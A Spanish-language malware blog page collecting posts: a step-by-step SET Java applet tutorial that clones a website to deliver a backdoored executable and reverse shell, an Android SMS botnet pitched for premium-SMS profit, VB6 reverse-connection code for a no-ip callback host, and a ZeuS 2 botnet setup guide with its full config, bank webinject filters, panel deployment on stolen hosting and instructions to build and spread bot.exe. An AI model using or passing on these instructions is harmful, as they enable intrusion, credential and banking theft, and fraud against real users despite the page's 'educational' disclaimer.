Mostrando entradas con la etiqueta Malwares. Mostrar todas las entradas

Java Applet Attack Method – Backdorizacion con SET

 

Introducción

En este paper vamos a ver como funciona la herramienta SET (Social Engineer Toolkit). Lo utilizaremos para obtener una Shell en la pc que intentamos atacar.
El m̩todo que veremos ahora de Applet Attack afecta a Java, por lo que lo convierte en un ataque multiplataforma (Windows РLinux РMAC)
Para este tutorial usare 2 pcs, una para atacar (Backtrack – Linux) y la otra será mi objetivo (Windows 7). Todo lo hare en mi ambiente local.
SET ya viene instalado en Backtrack. Podemos encontrarlo en:

Applications >> BackTrack >> Exploitation Tools >> Social Engineering Tools >> Social Engineering Toolkits >> SET

Cuando lo abramos por primera vez, podremos ver algo como esto:


Son los términos y conficiones de uso. Presionamos la tecla “Y” seguido de la tecla Enter para continuar.

Preparando el Escenario

Una vez dentro, podremos ver algo como esto:


Seleccionamos la primera opción: Social-Engineering Attacks que es a lo que está enfocado este tutorial.

Luego, veremos algo como esto:

 

Seleccionamos la opción 2: Website Attack Vectors

Elegimos esta opción debido a que haremos una especie de FAKE de un Website


Seleccionamos la opción 1, Java Applet Attack Method

A continuación veremos lo siguiente
 


Tenemos 3 opciones…
1)    Web Templates >> SET trae cargado algunos templates ya prediseñados como de Google, Gmail, Facebook, etc… Si deseamos usar alguno de ellos, seleccionamos esta opción
2)    Site Cloner >> Clonar Sitio, yo utilizare esta opción para clonar un sitio en especifico
3)    Custom Import, para importar algún template customizado
En mi caso seleccionare la opción 2


Me detendré un momento en esta parte, ya que son varios pasos juntos.

Por un lado tenemos el primer YES. Este hace referencia a si estamos o no usando NAT. En mi caso pongo Yes, ya que este experimento lo hare en local.

Luego aparece una ip… Esa es mi ip privada (la de mi red interna) del lado izquierdo, en una consola pulse ifconfig y me arrojo la ip que tiene mi pc. En este caso es 192.168.1.8 y esa misma ip es la que debo poner en SET.

Luego aparece el NO. Ese no es por el mismo motivo de que estoy testeando todo en local y no en una red externa.

Finalmente me pide que ingrese la URL a clonar (En el paso anterior había seleccionado la opción “Site Cloner”) asique ahora coloque la url del sitio que deseo clonar y es underc0de.org


Ahora tenemos montones de cosas que podemos hacer. Yo seleccionare la primera opción, Windows Shell Reverse TCP. Para obtener una Shell de la pc que estoy atacando.



Ahora nos salen métodos de ejecutar el método, y siempre se suele seleccionar el que tiene el BEST. En este caso es el numero 16 Backdoored Executable (BEST)

Luego nos pedirá un puerto de escucha, y por defecto aparece el 443, asique dejaremos ese.

Una vez hecho todo esto, comenzara a crear el clon de la web. Simplemente lo dejamos correr hasta que finalice… Suele demorar unos minutos…



Finalmente, nos arroja una IP y un Puerto. Esa IP, es la que configuramos anteriormente y la que usaremos para atacar. Para que quede menos sospechoso, a esa IP la podemos ocultar con algún acortador de URL para que pase desapercibido.

Atacando al Objetivo

Ya estamos en la última parte del tutorial. En mi caso al ser en local, pondré esa IP (solo la IP) en el navegador de la pc que voy a atacar y veamos que pasa…



Como podemos ver, me cargo el clon de la página y me apareció una alerta en Java. Si doy click en Ejecutar, tenemos la Shell!

Posiblemente la consola que tenemos abierta con SET se vuelva loca y empiece a tirar líneas sola, eso es normal. Quiere decir que todo se ejecuto correctamente. Una vez que se detenga, presionamos Enter y podremos escribir. Tipeamos lo siguiente: sessions –l


Esto nos mostrara las sesiones activas. Yo seleccionare la 1, ya que es en la que esta mi pc con Windows a la que estoy atacando.


Asique ahora tipeo: sessions –i  1



Y Listooo!!
Como podemos ver, ya hemos logrado tener Shell en la pc que atacábamos!
Ahora podemos ejecutar comando a nuestro gusto!
Como por ejemplo: start /wait firefox.exe “http://underc0de.org”


Y nos abrirá la página de underc0de.

Otra cosa que podemos hacer es entrar a un FTP, descargar un archivo y luego ejecutarlo. De esta forma podríamos descargar un malware y ejecutarlo en la pc a la que estamos atacando. O también con wget en caso de ser Linux.
De ahora en más depende de nuestra imaginación lo que queramos hacer.

Despedida

Esto es todo por ahora, espero que les sea de utilidad. Quiero agradecer a [C]orrupted[B]yte, ya que por el me inicie con SET y la verdad es que es una herramienta muy útil.

Android Botnet

Hola a todos los lectores de mi blog. LLevaba tiempo sin postear nada en el blog y se debe a que he estado inviertiendo tiempo en underc0de.
En esta ocasion les traigo algo muy curioso que encontre, se trata de una botnet para telefonos moviles con Android.
La funcion principal es infectar muchos telefonos moviles, y luego por medio de comandos, ejecuta alguna accion. En este caso es el envio de sms.
Pensando un poco, llegue a la conclusion de que se le podria sacar provecho con esas paginas que pagan por sms. Ya que si se infectan 50 telefonos y se envian 4 mensajes con cada uno de ellos, harian un total de 200 sms... Imaginen el dinero que se podria sacar con eso...
No expongo esto para que hagan exactamente eso, sino para que estudien su codigo y para que vean con que fuerza se vienen estos nuevos malwares futuristicos.


El comando del bot es:

BOT: SPAM {number to spam} {message}

Saludos a todos!

ANTRAX

Conexion Inversa

Introducción:

Hola a todos, en este papers les enseñare a crear una conexión inversa para que puedan colocarla luego en sus malwares.
El método que les mostrare es muy sencillo y se puede mejorar muchísimo, pero es para que tengan una idea de cómo se usa.
Lo que necesitaremos para este tutorial será tener una cuenta en www.no-ip.com

NO-IP

Una vez registrados, nos logueamos colocando nuestro mail y pass que colocamos. Seguido a esto, veremos un menú como este:

Vamos a Add a Host y únicamente colocamos el hostname que usaremos. El resto lo dejaremos tal cual esta.

Presionamos en el botón Create Host y listo.

Ahora nos descargamos el cliente para conectarnos a nuestra no-ip que su descarga está disponible en esa misma web.

Una vez descargado, lo instalamos y tendremos algo como lo siguiente:

Nos logueamos con el user y pass con los cuales nos registramos y veremos la no-ip que nos hemos creado:

La activamos y damos en Save

Si tenemos las tres tildes en verde, es porque todo está perfecto. Ahora pasaremos a la programación.

Implementación en el server

Ahora lo que nos quedaría, seria colocarlo en el server.
Agregamos el control Winsock. Vamos al menú en Proyecto y seleccionamos Componentes
Y añadimos el control Microsoft Winsock Control 6.0

 Nos aparecerá un nuevo control con este icono:

Simplemente lo arrastramos hacia adentro del formulario:

Ahora damos doble click sobre el formulario y añadimos el siguiente código:
Private Sub Form_Load()
'Conexion Inversa
Dim ip As String
Dim ipftp As String
Dim port As Integer

ip = "antrax-labs.no-ip.org"
ipftp = "antrax-labs.no-ip.org"
port = 81
WS.RemoteHost = ip
WS.RemotePort = port
tmr_inversa.in terval = "3000"
End Sub
Recuerden cambiar IP, IPFTP por su no-ip y el Puerto por el que tengan abierto en su router.
Como bien dije al principio, esto se puede mejorar y mucho, ya que en lugar de modificar el código fuente del server manualmente se vuelve tedioso y puede ser reemplazado por un edit server o un build server desde el cliente. Pero eso ya quedara para otro tutorial.
Espero que les sirva y hayan entendido como funciona.

Taller de Malwares #4 [Botnets]


¿Qué es una Botnet?
  La palabra Botnet, proviene de Bot (robot). Están compuestos por un cliente y por “zombies”, Los zombies son los ordenadores infectados por dicha Botnet, y el cliente es el que utilizaremos para darles órdenes por medio de comandos.

Tipos de Clientes
  Hay varias formas de manipular una Botnet, entre los cuales podemos resaltar los siguientes:

-   IRC
-   Web Panel
-   Clientes de escritorio

  En el IRC, lo que hacemos es que todos nuestros zombies conecten a un mismo canal de IRC y esperen órdenes por medio de comandos.

Como podemos ver en esta imagen, todos los nombres de la derecha son ordenadores infectados por esta Botnet.
  De forma muy similar pasa con el Web Panel, los zombies conectan a una misma IP, en donde tendremos un panel en el cual podremos introducir comandos.
Cuando digo Clientes de escritorio, hago referencia a que es similar a un troyano, con su Cliente-Servidor. Los zombies conectan a una DNS y desde nuestro cliente podremos darles órdenes.

¿Cómo Funcionan las Botnets?
  Al igual que los troyanos, las Botnets están compuestas por un cliente-servidor.
  Se propagan rápidamente por internet y tienen distintos tipos de Spreads. Entre ellos podemos destacar el muy conocido spread por MSN que seguramente más de una vez lo hemos visto.

En este caso envía un archivo “photo39.zip” en donde supuestamente envía fotos, pero no es más que un malware

En esta otra imagen podemos ver que nos envía un enlace que supuestamente tiene una canción. Pero no nos lleva a otro lado que no sea una infección segura…
También existe la infección en Facebook que es un medio de comunicación y la red social más utilizada hoy en día.

En los dos casos muestra videos que se ven tentadores, pero es un gusano que se propaga por Facebook. Asique si alguna vez entraron, lo más probable es que se hayan infectado…
Otro tipo de infección es por URL.

 En este caso nos aparece una advertencia sobre la actualización de Flash Player. Pero al dar en ejecutar, no haremos otra que cosa que sea ejecutar el server que nos infectara…
Así como estos que hemos visto, existen más formas de las cuales podremos infectarnos. Y por más que tengamos el Antivirus actualizado, nos infectaremos igual. Más adelante veremos porque cuando veamos los métodos de indetectabilidad.
Las Botnets lo que producen siempre es una infección en cadena. Esto quiere decir que si yo infecto a un contacto mío en el caso del MSN o a un amigo del Facebook, este infectara a los suyos, y a su vez este a los suyos y así sucesivamente hasta formar una gran cadena de infección con miles y miles de PCs zombies esperando mis órdenes para atacar…

 
¿Para qué Sirven las Botnets?
Las Botnets son utilizadas para hacer Spam con la finalidad de obtener información financiera para poder sacarle provecho. Al tener buena propagación, se infectan miles de ordenadores en busca de cuentas bancarias, tarjetas de crédito, y otros logins de interés.
Otro uso que se le suele dar es el de abuso de publicidad con el servicio que nos brinda adsense. De esta forma se puede obtener mayor cantidad de visitas gracias a los zombies que tengamos en nuestra Botnet y de esta forma ganar bastante dinero.
También es muy utilizada para ataques de DDoS (Denegacion de servicio distribuido) que sirve para tirar websites, foros y puede llegar a causar daños en la base de datos o consumir el ancho de banda para que deje de funcionar.
Otros usos que se les puede dar, que aunque no son muy vistos, es bueno mencionarlos:
· Construir servidores para alojar software warez, cracks, seriales, etc
· Construir servidores web para alojar material pornográfico y pedofílico
· Construir servidores web para ataques de phishing
· Redes privadas de intercambio de material ilegal
· Sniffing de tráfico web para robo de datos confidenciales
· Distribución e instalación de nuevo malware
· Manipulación de juegos online

¿Qué diferencia hay entre un ataque DoS y un DDoS?

Ataque DoS
Un servidor web está preparado para soportar una cierta cantidad de peticiones o conexiones simultáneas. Si supera ese límite de conexiones, pueden pasar dos cosas:
1)     La respuesta de las peticiones de los usuarios pueden ser lentas o nulas
2)     El Servidor se desconecta de la red y queda sin conexión.

A eso se le llama ataque DoS (Denial o Service / Denegacion de Servicio) Satura el servidor por medio de muchas peticiones de una misma pc que poco a poco va consumiendo recursos hasta que comience a rechazar las peticiones y comenzara a denegar el servicio (DoS)
Como desventaja tiene que el administrador puede ver de dónde vienen todos esos ataques, banea la IP y el ataque cesa…

Ataque DDoS

Esto es algo similar al ataque DoS, ya que este tipo de ataque también consiste en tirar el servidor. La diferencia está en que este ataque es distribuido. Esto quiere decir que no se ataca desde una sola PC como en el DoS, sino que son muchas PCs, haciendo peticiones al mismo servidor. El administrador de la web no podrá saber de dónde viene el ataque, por lo tanto cuesta más detenerlo. A esto se lo llama Denegación de Servicio Distribuida (DDoS)

Este tipo de ataque (DDoS) Se hace con una red Zombie. En otras palabras, se hace con una Botnet.
En ambos casos lo que se busca es consumir el ancho de banda del servidor para tirar la web.
Obviamente es mucho más potente un ataque con una Botnet ya que son varias PCs las que atacan a un solo sitio.

¿Cómo montar una Botnet?
Si bien mencione antes los 3 tipos de Botnets, ya sea por IRC, HTTP, o un ejecutable programado en algún lenguaje. En los tres casos vemos que los zombies deben apuntar al mismo sitio. En el caso del IRC, apuntarlo a un canal registrado en algún servidor. Si es por HTTP, apuntarlo a un host y si es por cliente de escritorio, apuntarlo a algún subdominio (DNS). En todos los casos corremos riesgos de perder todos los remotos, ya que puede ser denunciada o que nos descubran.
Ahora les enseñare cómo montar una Botnet.

BOTNET POR IRC
Lo que debemos hacer es tener una buena PC con buena conexión para que soporte todos los remotos. Una vez que la tenemos, podemos crear un servidor de IRC y mandar a todos los zombies ahí. De esta manera no se perderán con facilidad todos los remotos que tengamos.
Montaremos un servidor de IRC en nuestra propia PC.
Descargamos el IRCPlus, Lo instalamos y nos vamos a su pantalla principal de configuración:

Colocamos un nombre en el Server y una descripción.
Es importante aclarar que el puerto que pongamos, en mi caso el 2000, debe estar abierto en nuestro router en caso de que tengamos. En caso de tener router y no tenerlo abierto, lo abrimos de la misma forma que cuando usamos un troyano.
El resto de las opciones son a su gusto, como por ejemplo la de los canales:

Importantísimo lo que esta remarcado en rojo, ya que de esta forma podrán entrar todos los zombies a nuestro canal sin ningún tipo de restricción.
También es bueno crear un user admin para controlar el canal y el servidor.
Registramos el Nick:

Y luego Vamos a Operators

Como pueden ver, ahí mi user esta como Operador del IRC.
Ahora vamos a nuestro cliente de irc

Colocamos /server “NO-IP” o IP
En mi caso coloque mi no-ip de test

Ahí nos da una bienvenida.
Identifico mi user de la siguiente manera
/pass “Password”
Ejemplo: /pass 12345
Y por ultimo entramos al canal:

Bueno, ahí entraran nuestros zombies y podremos manipularlos por comandos definidos previamente en la botnet.
Aca les pongo una captura de ejemplo de cómo se ve una botnet por IRC. Cuando entran zombies

Como ven el primero de todo es el Operador del canal, quien manipulara la Botnet, y el resto son los zombies.
De esta forma, no podrán darnos de baja el canal ya que el servidor lo tendremos montado en nuestra propia PC. Lo único malo es que pueden localizar en donde está el servidor. Esto corre bajo sus propios riesgos.

BOTNET POR HTTP
Ahora les enseñare a cómo montar una Botnet por HTTP. En este caso utilizaremos la ZEUS Botnet 2 que es la más reciente.
Les mostrare como montarla con las configuraciones básicas, ya que se pueden agregar opciones más avanzadas, pero para no complicarla tanto, veremos lo básico para que quede funcionando.
En la carpeta de la Botnet podremos ver todos estos directorios

La carpeta llamada “server[php]” es la que debemos subir a algún hosting. Este hosting no debe ser gratuito.
Para todos los que vienen siguiendo y practicando estos talleres, podrán notar que pueden utilizar algún FTP con Cpanel capturada con el Stealer.
Dentro de esta carpeta podremos ver los siguientes ficheros y directorios:

Abrimos el cliente de FTP y los subimos a todos

Una vez hecho esto, lo que deberemos hacer, es crear una base de datos y un usuario que acceda a ella.
Para ello debemos ir al Cpanel ---> MySQL Bases de Datos

Una vez creada, haremos también un usuario

Y finalmente las vinculamos

Le damos todos los permisos a la cuenta

   
Y Listo, ya tenemos hecha nuestra base de datos, que será en donde se guarden todos los logs que capturemos.
Ahora configuraremos el server del Bot. Para ello vamos al directorio Builder y abrimos el archivo llamado config.txt
Les pego el texto plano del *.txt
;Build time:   22:38:59 11.03.2011 GMT
;Version:      2.0.8.9

entry "StaticConfig"
  ;botnet "btn1"
  timer_config 60 1
  timer_logs 1 1
  timer_stats 20 1
  url_config "http://localhost/config.bin"
  remove_certs 1
  disable_tcpserver 0
  encryption_key "secret key"
end

entry "DynamicConfig"
  url_loader "http://localhost/bot.exe"
  url_server "http://localhost/gate.php"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
    ;"http://advdomain/cfg1.bin"
  end
  entry "WebFilters"
    "!*.microsoft.com/*"
    "!http://*myspace.com*"
    "https://www.gruposantander.es/*"
    "!http://*odnoklassniki.ru/*"
    "!http://vkontakte.ru/*"
    "@*/login.osmp.ru/*"
    "@*/atl.osmp.ru/*"
  end
  entry "WebDataFilters"
    ;"http://mail.rambler.ru/*" "passw;login"
  end
  entry "WebFakes"
    ;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
  end
end
Y acá una imagen de cómo debería quedar:

Pasare a explicar las modificaciones:
;botnet "btn1"
Modificamos a lo que está entre comillas por localhost, que será en donde estará situada la botnet.
url_config "http://localhost/config.bin"
Modificamos la Url por la nuestra. En este caso debemos especificar en donde se encuentra el config.bin (que aun no hemos creado, pero es el directorio que se estima que estará)
encryption_key "secret key"
Acá debemos poner una llave secreta. Que es un código que nosotros queramos. En mi caso presione varias teclas al azar.
url_loader "http://localhost/bot.exe"
url_server "http://localhost/gate.php"
Por último tenemos estas dos, una es en donde tenemos el bot.exe (que aun no lo hemos creado, pero es en donde estará alojado) Y el otro es el gate.php que ya hemos subido previamente.
Ahora abrimos el zsb para crear el config.bin y el bot.exe que nos faltan.

En Encryption Key, la llave que colocamos en el config.txt
Seguido a esto vamos a Builder.
Damos en Browse… y Buscamos el config.txt
Seguido a esto damos click en “Build the Bot Configuration
Guardamos el config.bin que nos genera y finalmente damos click en “Build the bot Executable
Y guardamos el bot.exe

Ahora si subimos el config.bin y el bot.exe por FTP.

Una vez hecho esto, ya estamos en condiciones de comenzar a infectar.
Ese bot.exe que generamos es el server que debemos propagar.

Entramos vía web a nuestro panel. Recuerden que el panel es ese que se llama cp.php

Procederé a autoinfectarme, para probar si funciona (Ustedes no hagan este paso ya que dañara severamente su ordenador)
Una vez ejecutado el server, este desaparecerá y conectara a nuestro cliente vía web, Se verá algo así:

Si investigan un poco el panel del bot, podrán ver las opciones para ver los logs, para atacar webs, etc…
También tenemos la Botnet con cliente de escritorio que no es necesario que la explique ya que no es muy frecuente verla y se configura de igual forma que un troyano común.
Este material expuesto es con fines educativos. No me hago responsable del mal uso que se le pueda dar.
Suscribirse a: Entradas (Atom)